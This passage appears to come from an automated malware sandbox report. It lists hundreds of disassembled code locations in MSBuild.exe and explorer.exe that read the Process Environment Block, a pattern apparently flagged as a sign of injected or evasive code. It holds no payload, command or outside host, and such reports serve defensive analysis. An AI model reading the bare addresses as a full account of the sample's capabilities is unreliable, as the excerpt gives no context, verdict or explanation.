Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h] 4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D2ACB mov eax, dword ptr fs:[00000030h] 4_2_015D2ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D2AE4 mov eax, dword ptr fs:[00000030h] 4_2_015D2AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DD294 mov eax, dword ptr fs:[00000030h] 4_2_015DD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DD294 mov eax, dword ptr fs:[00000030h] 4_2_015DD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015BAAB0 mov eax, dword ptr fs:[00000030h] 4_2_015BAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015BAAB0 mov eax, dword ptr fs:[00000030h] 4_2_015BAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DFAB0 mov eax, dword ptr fs:[00000030h] 4_2_015DFAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h] 4_2_015A52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h] 4_2_015A52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h] 4_2_015A52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h] 4_2_015A52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h] 4_2_015A52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015C7D50 mov eax, dword ptr fs:[00000030h] 4_2_015C7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E3D43 mov eax, dword ptr fs:[00000030h] 4_2_015E3D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01623540 mov eax, dword ptr fs:[00000030h] 4_2_01623540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01653D40 mov eax, dword ptr fs:[00000030h] 4_2_01653D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CC577 mov eax, dword ptr fs:[00000030h] 4_2_015CC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CC577 mov eax, dword ptr fs:[00000030h] 4_2_015CC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01678D34 mov eax, dword ptr fs:[00000030h] 4_2_01678D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0162A537 mov eax, dword ptr fs:[00000030h] 4_2_0162A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166E539 mov eax, dword ptr fs:[00000030h] 4_2_0166E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D4D3B mov eax, dword ptr fs:[00000030h] 4_2_015D4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D4D3B mov eax, dword ptr fs:[00000030h] 4_2_015D4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D4D3B mov eax, dword ptr fs:[00000030h] 4_2_015D4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AAD30 mov eax, dword ptr fs:[00000030h] 4_2_015AAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h] 4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h] 4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h] 4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h] 4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h] 4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h] 4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h] 4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h] 4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h] 4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h] 4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h] 4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h] 4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h] 4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0166FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0166FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0166FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0166FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01658DF1 mov eax, dword ptr fs:[00000030h] 4_2_01658DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h] 4_2_01626DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h] 4_2_01626DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h] 4_2_01626DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01626DC9 mov ecx, dword ptr fs:[00000030h] 4_2_01626DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h] 4_2_01626DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h] 4_2_01626DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015BD5E0 mov eax, dword ptr fs:[00000030h] 4_2_015BD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015BD5E0 mov eax, dword ptr fs:[00000030h] 4_2_015BD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DFD9B mov eax, dword ptr fs:[00000030h] 4_2_015DFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DFD9B mov eax, dword ptr fs:[00000030h] 4_2_015DFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016705AC mov eax, dword ptr fs:[00000030h] 4_2_016705AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016705AC mov eax, dword ptr fs:[00000030h] 4_2_016705AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h] 4_2_015A2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h] 4_2_015A2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h] 4_2_015A2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h] 4_2_015A2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h] 4_2_015A2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D2581 mov eax, dword ptr fs:[00000030h] 4_2_015D2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D2581 mov eax, dword ptr fs:[00000030h] 4_2_015D2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D2581 mov eax, dword ptr fs:[00000030h] 4_2_015D2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D2581 mov eax, dword ptr fs:[00000030h] 4_2_015D2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D1DB5 mov eax, dword ptr fs:[00000030h] 4_2_015D1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D1DB5 mov eax, dword ptr fs:[00000030h] 4_2_015D1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D1DB5 mov eax, dword ptr fs:[00000030h] 4_2_015D1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D35A1 mov eax, dword ptr fs:[00000030h] 4_2_015D35A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DA44B mov eax, dword ptr fs:[00000030h] 4_2_015DA44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015C746D mov eax, dword ptr fs:[00000030h] 4_2_015C746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0163C450 mov eax, dword ptr fs:[00000030h] 4_2_0163C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0163C450 mov eax, dword ptr fs:[00000030h] 4_2_0163C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h] 4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h] 4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h] 4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h] 4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h] 4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h] 4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h] 4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h] 4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h] 4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h] 4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h] 4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h] 4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h] 4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h] 4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01626C0A mov eax, dword ptr fs:[00000030h] 4_2_01626C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01626C0A mov eax, dword ptr fs:[00000030h] 4_2_01626C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01626C0A mov eax, dword ptr fs:[00000030h] 4_2_01626C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01626C0A mov eax, dword ptr fs:[00000030h] 4_2_01626C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0167740D mov eax, dword ptr fs:[00000030h] 4_2_0167740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0167740D mov eax, dword ptr fs:[00000030h] 4_2_0167740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0167740D mov eax, dword ptr fs:[00000030h] 4_2_0167740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DBC2C mov eax, dword ptr fs:[00000030h] 4_2_015DBC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01626CF0 mov eax, dword ptr fs:[00000030h] 4_2_01626CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01626CF0 mov eax, dword ptr fs:[00000030h] 4_2_01626CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01626CF0 mov eax, dword ptr fs:[00000030h] 4_2_01626CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016614FB mov eax, dword ptr fs:[00000030h] 4_2_016614FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01678CD6 mov eax, dword ptr fs:[00000030h] 4_2_01678CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B849B mov eax, dword ptr fs:[00000030h] 4_2_015B849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01678F6A mov eax, dword ptr fs:[00000030h] 4_2_01678F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015BEF40 mov eax, dword ptr fs:[00000030h] 4_2_015BEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015BFF60 mov eax, dword ptr fs:[00000030h] 4_2_015BFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CF716 mov eax, dword ptr fs:[00000030h] 4_2_015CF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DA70E mov eax, dword ptr fs:[00000030h] 4_2_015DA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DA70E mov eax, dword ptr fs:[00000030h] 4_2_015DA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0167070D mov eax, dword ptr fs:[00000030h] 4_2_0167070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0167070D mov eax, dword ptr fs:[00000030h] 4_2_0167070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DE730 mov eax, dword ptr fs:[00000030h] 4_2_015DE730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0163FF10 mov eax, dword ptr fs:[00000030h] 4_2_0163FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0163FF10 mov eax, dword ptr fs:[00000030h] 4_2_0163FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A4F2E mov eax, dword ptr fs:[00000030h] 4_2_015A4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A4F2E mov eax, dword ptr fs:[00000030h] 4_2_015A4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E37F5 mov eax, dword ptr fs:[00000030h] 4_2_015E37F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B8794 mov eax, dword ptr fs:[00000030h] 4_2_015B8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01627794 mov eax, dword ptr fs:[00000030h] 4_2_01627794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01627794 mov eax, dword ptr fs:[00000030h] 4_2_01627794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01627794 mov eax, dword ptr fs:[00000030h] 4_2_01627794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h] 4_2_015B7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h] 4_2_015B7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h] 4_2_015B7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h] 4_2_015B7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h] 4_2_015B7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h] 4_2_015B7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166AE44 mov eax, dword ptr fs:[00000030h] 4_2_0166AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166AE44 mov eax, dword ptr fs:[00000030h] 4_2_0166AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h] 4_2_015CAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h] 4_2_015CAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h] 4_2_015CAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h] 4_2_015CAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h] 4_2_015CAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B766D mov eax, dword ptr fs:[00000030h] 4_2_015B766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DA61C mov eax, dword ptr fs:[00000030h] 4_2_015DA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DA61C mov eax, dword ptr fs:[00000030h] 4_2_015DA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0165FE3F mov eax, dword ptr fs:[00000030h] 4_2_0165FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AC600 mov eax, dword ptr fs:[00000030h] 4_2_015AC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AC600 mov eax, dword ptr fs:[00000030h] 4_2_015AC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AC600 mov eax, dword ptr fs:[00000030h] 4_2_015AC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D8E00 mov eax, dword ptr fs:[00000030h] 4_2_015D8E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661608 mov eax, dword ptr fs:[00000030h] 4_2_01661608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AE620 mov eax, dword ptr fs:[00000030h] 4_2_015AE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D36CC mov eax, dword ptr fs:[00000030h] 4_2_015D36CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E8EC7 mov eax, dword ptr fs:[00000030h] 4_2_015E8EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0165FEC0 mov eax, dword ptr fs:[00000030h] 4_2_0165FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01678ED6 mov eax, dword ptr fs:[00000030h] 4_2_01678ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B76E2 mov eax, dword ptr fs:[00000030h] 4_2_015B76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D16E0 mov ecx, dword ptr fs:[00000030h] 4_2_015D16E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01670EA5 mov eax, dword ptr fs:[00000030h] 4_2_01670EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01670EA5 mov eax, dword ptr fs:[00000030h] 4_2_01670EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01670EA5 mov eax, dword ptr fs:[00000030h] 4_2_01670EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016246A7 mov eax, dword ptr fs:[00000030h] 4_2_016246A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0163FE87 mov eax, dword ptr fs:[00000030h] 4_2_0163FE87
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B0849B mov eax, dword ptr fs:[00000030h] 9_2_04B0849B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h] 9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h] 9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h] 9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h] 9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h] 9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h] 9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h] 9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h] 9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h] 9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h] 9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h] 9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h] 9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h] 9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB14FB mov eax, dword ptr fs:[00000030h] 9_2_04BB14FB
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B76CF0 mov eax, dword ptr fs:[00000030h] 9_2_04B76CF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B76CF0 mov eax, dword ptr fs:[00000030h] 9_2_04B76CF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B76CF0 mov eax, dword ptr fs:[00000030h] 9_2_04B76CF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC8CD6 mov eax, dword ptr fs:[00000030h] 9_2_04BC8CD6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2BC2C mov eax, dword ptr fs:[00000030h] 9_2_04B2BC2C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC740D mov eax, dword ptr fs:[00000030h] 9_2_04BC740D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC740D mov eax, dword ptr fs:[00000030h] 9_2_04BC740D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC740D mov eax, dword ptr fs:[00000030h] 9_2_04BC740D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 9_2_04BB1C06
